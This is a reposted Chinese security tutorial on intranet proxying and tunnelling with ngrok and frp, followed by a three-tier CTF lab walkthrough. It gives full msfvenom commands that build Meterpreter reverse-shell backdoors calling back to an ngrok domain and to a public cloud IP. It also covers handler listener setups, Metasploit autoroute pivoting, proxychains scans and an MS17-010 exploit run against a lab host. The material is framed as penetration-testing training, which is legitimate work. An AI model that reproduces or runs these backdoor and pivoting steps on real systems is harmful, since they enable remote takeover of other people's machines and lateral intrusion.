主頁 >  其他 > 【內網安全】域橫向內網漫游Socks代理隧道技術

【內網安全】域橫向內網漫游Socks代理隧道技術

2021-09-23 11:26:29 其他

代理技術和隧道技術都屬于內網穿透,代理主要解決內網里面通信的問題比如對方在內網,你也在內網,這時候兩個內網實作通信就必須要經過代理才能實作,常見工具有frp、ngrok和ew等,ew(earthworm已經停止更新了,就不演示),和一些防火墻的攔截
隧道主要是一些安全設備和流量監控設備上的攔截問題

代理主要解決的是三種問題:內網主機有外網,內網有過濾有一些防火墻問題、內網里面無外網

必要基礎知識點:

1.內外網簡單知識

內網ip地址是私有ip地址(10/8, 172.16/12 , 192.168/16),除此之外就是公有ip

2.內網1和內網2通信問題

1主機在內網1,2主機在內網2.就好比說你在學校宿舍上網,我在網吧上網,我們都屬于內網,但是我們不是一個內網,您是學校內網,我是網吧內網,這兩個網路如果要實作通信,比如我現在有個后門CS或者MSF生成一個后門發給你,你去執行這個后門,這個時候如果你能讓對方上線到你這是上線不了的,因為你們都是內網,除非這個時候采用一些代理技術,你用CS想控制這臺內網主機,你CS在另外一個內網,受害主機在一個內網,那么上線是不可能的,必須要借助代理

3.正反向協議通信連接問題

正向代理就是正方向的連接,反向代理就是反方向的連接
什么是正方向,什么是反方向呢?
如果是控制端去連接被控制端的話,就屬于正向代理,
被控制端去連接控制端就是反向代理,

這個正向代理和反向代理為什么要區分開呢?
你的控制端如果是服務器,是外網一臺主機,就是公網的一臺服務器,就相當于你在外網有一個唯一的IP地址,通過這個IP地址你能夠找到你;
被控制的肉雞是內網,如果你去主動找這臺被控的內網主機你是找不到的,

4.內網穿透代理隧道技術說明

隧道主要解決流量分析工具和流量監控工具 還有想防火墻過濾問題
代理主要解決網路的連通性問題

黑客在湖南局域網,肉雞在上海局域網,你用的是自己內網里面的虛擬機kali生成的后門,你想實作控制上海的肉雞,
理論上,如果你不涉及到代理,是絕對控制不了的,因為你兩者都是內網,你生成后門的時候,你如果寫你外網的木馬地址的話,它去連接的時候找到的是你的路由器,你寫你內網地址的話,那就更加找不到,它就不可能實作控制,


這時候就要借助ngrok這款工具來實作連通,它是怎么實作呢?下面簡單把原理分析一下
用到ngrok這款工具的時候,ngrok會在外網啟動一臺服務器給你,相當于這臺肉雞想去找你的時候先去找這個服務器,服務器再傳輸給你,同樣,如果你要找這臺肉雞,也要經過這臺服務器,其實就是說,這款工具就是在中間架設一臺外網服務器,因為這臺外網服務器你和他都能訪問,你找對面肉雞的時候會經過外網服務器,這個資料要回連給控制端的時候也會找這臺外網服務器,服務器會在控制端這里有個客戶端,就相當于接收服務器給的資料,你出去,客戶端給服務器;資料連通就是正常的!其實就是找了一個中介!


演示案例:
? 內網穿透Ngrok測驗演示-兩個內網通訊上線
? 內網穿透Frp自建跳板測驗-兩個內網通訊上線
? CFS三層內網漫游安全測驗演練-某CTF線下2019

案例1-內網穿透Ngrok測驗演示-兩個內網通訊上線

實驗環境:兩個不同的內網(有網路)實作穿透控制
1.注冊-購買-填寫-確認http://www.ngrok.cc/(國內)
協議:http 本地埠:192.168.76.132:4444



kali就下載linux的客戶端

開通后點擊隧道管理

開兩臺虛擬機來模擬:用msf生成后門,再用一臺電腦來執行這個后門,兩臺電腦實作這個問題

打開kali:

寫這個隧道id就會找到那個外網上去


確保是online,如果不是online就說明隧道有問題

http://xiaodisec.free.idcfengye.com ——》192.168.76.132:4444(對方訪問這個網址就會指向這個ip)
192.168.76.132:4444就是本機kali的ip地址

2.測驗:內網1執行后門-免費主機處理-內網2監聽-內網2接受器

在卡里下生成后門:
msfvenom -p windows/meterpreter/reverse_http lhost=xiaodisec.free.idcfengye.com lport=80 -f exe -o test.exe(生成后門,因為選擇的是http協議,所以這里是reverse_http)生成一個后門,系結xiaodisec.free.idcfengye.com地址和 80埠

這時候把生成的后門檔案test.exe復制到windows7

下面配置后門監聽狀態(配置并監聽)一旦xiaodisec.free.idcfengye.com有流量,就發生給本地
msfconsole

use exploit/multi/handler # 選擇監聽模塊
set payload windows/meterpreter/reverse_http(和生成木馬的payload一致)配置引數
set lhost 192.168.76.132
set lport 4444

這時候windows7去執行后門檔案:


./sunny clientid aa0676878c162ffc
msfvenom -p windows/meterpreter/reverse_http lhost=xiaodisec.free.idcfengye.com lport=80 -f exe -o test.exe(生成后門)
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 192.168.76.132
set lport 4444
exploit


案例2-內網穿透Frp自建跳板測驗-兩個內網通訊上線

自行搭建,方便修改,成本低,使用多樣化,適合高富帥及隱私哥哥們
1.服務端-下載-解壓-修改-啟動阿里云主機記得修改安全組配置出入口)用xshell連接云服務器更改frps.ini
服務器修改組態檔frps.ini:
[common]
bind_port = 6677
啟動服務端:
./frps -c ./frps.ini



2.控制端-下載-解壓-修改-啟動
控制端修改組態檔frpc.ini:
[common]
server_addr = 你的云主機ip
server_port = 6677 #frpc作業埠,必須和上面frps保持一致
[msf]
type = tcp
local_ip = 127.0.0.1
local_port = 5555 #轉發給本機的5555
remote_port = 6000 #服務端用6000埠轉發給本機


啟動客戶端(kali):
./frpc -c ./frpc.ini

生成后門:
msfvenom -p windows/meterpreter/reverse_tcp lhost=101.37.160.211(你的公網ip) lport=6000 -f exe -o frp.exe
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 127.0.0.1
set LPORT 5555
exploit

監聽后把木馬放到windows7上面執行


3.靶機運行frp即可


案例3-CFS三層內網漫游安全測驗演練-某CTF線下2019

參考:CFS靶機實戰演練-從外網殺進三層內網,橫向滲透拿到Flag

環境:

來源2019某CTF線下賽真題內網結合WEB攻防題庫,涉及WEB攻擊,內網代理路由等技術,每臺服務器存在一個Flag,獲取每一個Flag對應一個積分,獲取三個Flag結尾,
Target1(centos7 x64):
探針目標-利用WEB漏洞(TP5_RCE)-獲取webshell權限-蟻劍連接--獲取Flag-Target2


1.生成linux后門:

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.76.132(kali的ip) LPORT=1111 -f elf >t1.elf

2.接受反彈:

msfconsole
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set LHOST 192.168.76.132
set LPORT 1111
exploit

將t1.elf通過webshell上傳上去

執行完成后,kali主機上劫持到會話,會話已經彈到kali上面,kali是76網段,怎么讓kali訪問到22網段?
msf上面有自帶的代理加持,在CS上面也有,先通過網路介面來判斷


3.資訊收集及配置訪問
獲取網路介面:run get_local_subnets(因為在實戰情況下是不知道這臺主機是什么網路的,前面是因為看了拓撲圖,這個就是獲取網卡資訊,確保下面有沒有內網)


查看路由地址:run autoroute -p(查看當前路由)


添加路由地址:run autoroute -s 192.168.22.0/24

添加路由后,我和22這個網卡是能通訊,但是你通訊怎么攻擊它呢?還是要使用工具,但是這個路由有個問題,只能在msf上通信,只能在msf會話上操作,msf有很多命令去探測,但是不能攻擊,這是就要本地開個代理,相當于給其他人一個介面,

相當于在這臺target1或者kali上面開個介面,讓外部人連接這個介面,因為目前kali已經可以訪問目標2,因為已經有路由了,所以可以在上面開個介面,那么我可以通過本機訪問kali的2222埠


開啟本地代理:
use auxiliary/server/socks4a
set srvport 2222
exploit

等一下連接2222就能和kali進行連接,


4.利用本地代理介面訪問測驗
設定瀏覽器代理進行訪問測驗
linux:
配置proxychains(代理工具)后呼叫工具探針Target2
/etc/proxychains.conf
socks4 192.168.76.132 2222(在組態檔中添加)
proxychains4 nmap -sT -Pn 192.168.22.0/24 -p80 (這樣nmap就會掃描22網段)
-Pn:掃描主機檢測其是否受到資料包過濾軟體或防火墻的保護,
-sT:掃描TCP資料包已建立的連接connect


windows:
利用代理工具Proxifier或SocksCap64載入代理進行行程訪問測驗

Target2(ubuntu x64):
探針目標-利用WEB漏洞(SQL注入)-后臺獲取webshell權限-獲取Flag-Target3
http://192.168.22.128/index.php?r=vul&keyword=1 #sql注入
http://192.168.22.128/index.php?r=admini/public/login #后臺
http://192.168.22.128/index.php?r=special #后門shell
1.生成正向后門:
msfvenom -p linux/x64/meterpreter/bind_tcp LPORT=3333 -f elf > t2.elf
2.訪問接受:
use exploit/multi/handler
set payload linux/x64/meterpreter/bind_tcp
set rhost 192.168.22.128
set LPORT 3333
exploit
3.資訊收集及配置訪問
獲取網路介面:run get_local_subnets
查看路由地址:run autoroute -p
添加路由地址:run autoroute -s 192.168.33.0/24


Target3:(windows7 x64)
探針目標-埠及漏洞掃描-利用MS17010獲取系統權限-獲取Flag-GG
proxychains4 nmap -Pn -sT 192.168.33.33
use exploit/windows/smb/ms17_010_psexec
set payload windows/meterpreter/bind_tcp
set RHOST 192.168.33.33
exploit
shell
dir /S flag.txt /B
type xxxxx.txt


涉及資源:
http://www.ngrok.cc/
https://gofrp.org/docs/
Releases · fatedier/frp · GitHub
https://pan.baidu.com/s/1Vh4ELTFvyBhv3Avzft1fCw提取碼: xiao

轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/302177.html

標籤:其他

上一篇:CTFshow刷題日記-WEB-反序列化篇(上,254-263)

下一篇:Web安全原理剖析(七)——二次注入攻擊

標籤雲
其他(157675) Python(38076) JavaScript(25376) Java(17977) C(15215) 區塊鏈(8255) C#(7972) AI(7469) 爪哇(7425) MySQL(7132) html(6777) 基礎類(6313) sql(6102) 熊猫(6058) PHP(5869) 数组(5741) R(5409) Linux(5327) 反应(5209) 腳本語言(PerlPython)(5129) 非技術區(4971) Android(4554) 数据框(4311) css(4259) 节点.js(4032) C語言(3288) json(3245) 列表(3129) 扑(3119) C++語言(3117) 安卓(2998) 打字稿(2995) VBA(2789) Java相關(2746) 疑難問題(2699) 细绳(2522) 單片機工控(2479) iOS(2429) ASP.NET(2402) MongoDB(2323) 麻木的(2285) 正则表达式(2254) 字典(2211) 循环(2198) 迅速(2185) 擅长(2169) 镖(2155) 功能(1967) .NET技术(1958) Web開發(1951) python-3.x(1918) HtmlCss(1915) 弹簧靴(1913) C++(1909) xml(1889) PostgreSQL(1872) .NETCore(1853) 谷歌表格(1846) Unity3D(1843) for循环(1842)

熱門瀏覽
  • 網閘典型架構簡述

    網閘架構一般分為兩種:三主機的三系統架構網閘和雙主機的2+1架構網閘。 三主機架構分別為內端機、外端機和仲裁機。三機無論從軟體和硬體上均各自獨立。首先從硬體上來看,三機都用各自獨立的主板、記憶體及存盤設備。從軟體上來看,三機有各自獨立的作業系統。這樣能達到完全的三機獨立。對于“2+1”系統,“2”分為 ......

    uj5u.com 2020-09-10 02:00:44 more
  • 如何從xshell上傳檔案到centos linux虛擬機里

    如何從xshell上傳檔案到centos linux虛擬機里及:虛擬機CentOs下執行 yum -y install lrzsz命令,出現錯誤:鏡像無法找到軟體包 前言 一、安裝lrzsz步驟 二、上傳檔案 三、遇到的問題及解決方案 總結 前言 提示:其實很簡單,往虛擬機上安裝一個上傳檔案的工具 ......

    uj5u.com 2020-09-10 02:00:47 more
  • 一、SQLMAP入門

    一、SQLMAP入門 1、判斷是否存在注入 sqlmap.py -u 網址/id=1 id=1不可缺少。當注入點后面的引數大于兩個時。需要加雙引號, sqlmap.py -u "網址/id=1&uid=1" 2、判斷文本中的請求是否存在注入 從文本中加載http請求,SQLMAP可以從一個文本檔案中 ......

    uj5u.com 2020-09-10 02:00:50 more
  • Metasploit 簡單使用教程

    metasploit 簡單使用教程 浩先生, 2020-08-28 16:18:25 分類專欄: kail 網路安全 linux 文章標簽: linux資訊安全 編輯 著作權 metasploit 使用教程 前言 一、Metasploit是什么? 二、準備作業 三、具體步驟 前言 Msfconsole ......

    uj5u.com 2020-09-10 02:00:53 more
  • 游戲逆向之驅動層與用戶層通訊

    驅動層代碼: #pragma once #include <ntifs.h> #define add_code CTL_CODE(FILE_DEVICE_UNKNOWN,0x800,METHOD_BUFFERED,FILE_ANY_ACCESS) /* 更多游戲逆向視頻www.yxfzedu.com ......

    uj5u.com 2020-09-10 02:00:56 more
  • 北斗電力時鐘(北斗授時服務器)讓網路資料更精準

    北斗電力時鐘(北斗授時服務器)讓網路資料更精準 北斗電力時鐘(北斗授時服務器)讓網路資料更精準 京準電子科技官微——ahjzsz 近幾年,資訊技術的得了快速發展,互聯網在逐漸普及,其在人們生活和生產中都得到了廣泛應用,并且取得了不錯的應用效果。計算機網路資訊在電力系統中的應用,一方面使電力系統的運行 ......

    uj5u.com 2020-09-10 02:01:03 more
  • 【CTF】CTFHub 技能樹 彩蛋 writeup

    ?碎碎念 CTFHub:https://www.ctfhub.com/ 筆者入門CTF時時剛開始刷的是bugku的舊平臺,后來才有了CTFHub。 感覺不論是網頁UI設計,還是題目質量,賽事跟蹤,工具軟體都做得很不錯。 而且因為獨到的金幣制度的確讓人有一種想去刷題賺金幣的感覺。 個人還是非常喜歡這個 ......

    uj5u.com 2020-09-10 02:04:05 more
  • 02windows基礎操作

    我學到了一下幾點 Windows系統目錄結構與滲透的作用 常見Windows的服務詳解 Windows埠詳解 常用的Windows注冊表詳解 hacker DOS命令詳解(net user / type /md /rd/ dir /cd /net use copy、批處理 等) 利用dos命令制作 ......

    uj5u.com 2020-09-10 02:04:18 more
  • 03.Linux基礎操作

    我學到了以下幾點 01Linux系統介紹02系統安裝,密碼啊破解03Linux常用命令04LAMP 01LINUX windows: win03 8 12 16 19 配置不繁瑣 Linux:redhat,centos(紅帽社區版),Ubuntu server,suse unix:金融機構,證券,銀 ......

    uj5u.com 2020-09-10 02:04:30 more
  • 05HTML

    01HTML介紹 02頭部標簽講解03基礎標簽講解04表單標簽講解 HTML前段語言 js1.了解代碼2.根據代碼 懂得挖掘漏洞 (POST注入/XSS漏洞上傳)3.黑帽seo 白帽seo 客戶網站被黑帽植入劫持代碼如何處理4.熟悉html表單 <html><head><title>TDK標題,描述 ......

    uj5u.com 2020-09-10 02:04:36 more
最新发布
  • 2023年最新微信小程式抓包教程

    01 開門見山 隔一個月發一篇文章,不過分。 首先回顧一下《微信系結手機號資料庫被脫庫事件》,我也是第一時間得知了這個訊息,然后跟蹤了整件事情的經過。下面是這起事件的相關截圖以及近日流出的一萬條資料樣本: 個人認為這件事也沒什么,還不如關注一下之前45億快遞資料查詢渠道疑似在近日復活的訊息。 訊息是 ......

    uj5u.com 2023-04-20 08:48:24 more
  • web3 產品介紹:metamask 錢包 使用最多的瀏覽器插件錢包

    Metamask錢包是一種基于區塊鏈技術的數字貨幣錢包,它允許用戶在安全、便捷的環境下管理自己的加密資產。Metamask錢包是以太坊生態系統中最流行的錢包之一,它具有易于使用、安全性高和功能強大等優點。 本文將詳細介紹Metamask錢包的功能和使用方法。 一、 Metamask錢包的功能 數字資 ......

    uj5u.com 2023-04-20 08:47:46 more
  • vulnhub_Earth

    前言 靶機地址->>>vulnhub_Earth 攻擊機ip:192.168.20.121 靶機ip:192.168.20.122 參考文章 https://www.cnblogs.com/Jing-X/archive/2022/04/03/16097695.html https://www.cnb ......

    uj5u.com 2023-04-20 07:46:20 more
  • 從4k到42k,軟體測驗工程師的漲薪史,給我看哭了

    清明節一過,盲猜大家已經無心上班,在數著日子準備過五一,但一想到銀行卡里的余額……瞬間心情就不美麗了。最近,2023年高校畢業生就業調查顯示,本科畢業月平均起薪為5825元。調查一出,便有很多同學表示自己又被平均了。看著這一資料,不免讓人想到前不久中國青年報的一項調查:近六成大學生認為畢業10年內會 ......

    uj5u.com 2023-04-20 07:44:00 more
  • 最新版本 Stable Diffusion 開源 AI 繪畫工具之中文自動提詞篇

    🎈 標簽生成器 由于輸入正向提示詞 prompt 和反向提示詞 negative prompt 都是使用英文,所以對學習母語的我們非常不友好 使用網址:https://tinygeeker.github.io/p/ai-prompt-generator 這個網址是為了讓大家在使用 AI 繪畫的時候 ......

    uj5u.com 2023-04-20 07:43:36 more
  • 漫談前端自動化測驗演進之路及測驗工具分析

    隨著前端技術的不斷發展和應用程式的日益復雜,前端自動化測驗也在不斷演進。隨著 Web 應用程式變得越來越復雜,自動化測驗的需求也越來越高。如今,自動化測驗已經成為 Web 應用程式開發程序中不可或缺的一部分,它們可以幫助開發人員更快地發現和修復錯誤,提高應用程式的性能和可靠性。 ......

    uj5u.com 2023-04-20 07:43:16 more
  • CANN開發實踐:4個DVPP記憶體問題的典型案例解讀

    摘要:由于DVPP媒體資料處理功能對存放輸入、輸出資料的記憶體有更高的要求(例如,記憶體首地址128位元組對齊),因此需呼叫專用的記憶體申請介面,那么本期就分享幾個關于DVPP記憶體問題的典型案例,并給出原因分析及解決方法。 本文分享自華為云社區《FAQ_DVPP記憶體問題案例》,作者:昇騰CANN。 DVPP ......

    uj5u.com 2023-04-20 07:43:03 more
  • msf學習

    msf學習 以kali自帶的msf為例 一、msf核心模塊與功能 msf模塊都放在/usr/share/metasploit-framework/modules目錄下 1、auxiliary 輔助模塊,輔助滲透(埠掃描、登錄密碼爆破、漏洞驗證等) 2、encoders 編碼器模塊,主要包含各種編碼 ......

    uj5u.com 2023-04-20 07:42:59 more
  • Halcon軟體安裝與界面簡介

    1. 下載Halcon17版本到到本地 2. 雙擊安裝包后 3. 步驟如下 1.2 Halcon軟體安裝 界面分為四大塊 1. Halcon的五個助手 1) 影像采集助手:與相機連接,設定相機引數,采集影像 2) 標定助手:九點標定或是其它的標定,生成標定檔案及內參外參,可以將像素單位轉換為長度單位 ......

    uj5u.com 2023-04-20 07:42:17 more
  • 在MacOS下使用Unity3D開發游戲

    第一次發博客,先發一下我的游戲開發環境吧。 去年2月份買了一臺MacBookPro2021 M1pro(以下簡稱mbp),這一年來一直在用mbp開發游戲。我大致分享一下我的開發工具以及使用體驗。 1、Unity 官網鏈接: https://unity.cn/releases 我一般使用的Apple ......

    uj5u.com 2023-04-20 07:40:19 more